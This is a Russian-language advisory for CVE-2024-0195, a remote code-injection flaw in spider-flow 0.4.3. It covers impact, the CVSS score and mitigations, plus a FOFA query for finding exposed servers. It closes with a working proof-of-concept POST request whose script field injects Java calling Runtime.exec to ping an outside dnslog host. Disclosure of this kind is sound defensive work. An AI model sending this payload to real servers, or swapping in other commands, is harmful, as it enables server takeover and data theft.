
CVE-2024-0195 Некорректный контроль генерации кода ('Внедрение кода')
CVE-2024-0195 — это критическая уязвимость внедрения кода в веб-приложении spider-flow 0.4.3, конкретно в функции FunctionService.saveFunction файла FunctionController.java. Злоумышленник может удалённо внедрить вредоносный код, который выполняется на сервере. Это позволяет полностью скомпрометировать приложение.
Эта уязвимость чрезвычайно опасна, так как позволяет удалённо выполнять код на сервере, на котором запущено уязвимое приложение spider-flow. Злоумышленник может полностью скомпрометировать сервер, похитить конфиденциальные данные, установить вредоносное ПО или криптомайнеры и использовать его для дальнейших атак внутри сети. Конфиденциальность, целостность и доступность приложения и сервера находятся под критическим воздействием.
Исправленная версия не указана явно, поэтому на данный момент установка патча не представляется возможной. Уязвимость была публично раскрыта, а эксплойты доступны, поэтому немедленное смягчение последствий имеет решающее значение.
До выхода официального патча spider-flow 0.4.3 следует немедленно отключить от сети или ограничить доступ только доверенными сетями/пользователями. В качестве временной меры можно настроить межсетевые экраны веб-приложений или другие средства контроля ввода для обнаружения и блокировки попыток внедрения кода. Однако это не является полным решением, и уязвимую версию следует обновить, как только станет доступен исправленный релиз.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
FOFA : app="spiderflow"
✔ Доказательство концепции
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139
id=&name=test¶meter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B